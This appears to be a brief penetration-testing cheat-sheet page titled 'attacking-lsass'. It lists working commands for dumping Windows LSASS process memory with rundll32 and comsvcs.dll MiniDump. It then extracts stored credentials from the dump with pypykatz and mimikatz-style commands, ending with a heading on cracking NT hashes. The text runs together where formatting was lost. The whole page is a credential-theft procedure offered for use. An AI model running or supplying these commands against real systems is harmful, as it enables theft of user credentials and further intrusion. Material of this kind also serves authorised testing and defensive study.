attacking-lsass
Dumping LSASS process memory
tasklist /svc (cmd)Get-Process lsass (powershell)rundll32 C:\windows\system32\comsvcs.dll, MiniDump 668 C:\tmp\lsass.dmp fullUsing pypykatz to Extracting credentials (from lsass dump file)
privilege::debuglsadump::lsa /patchpypykatz lsa minidump /home/peter/Documents/lsass.dmpCracking the NT hash
Last updated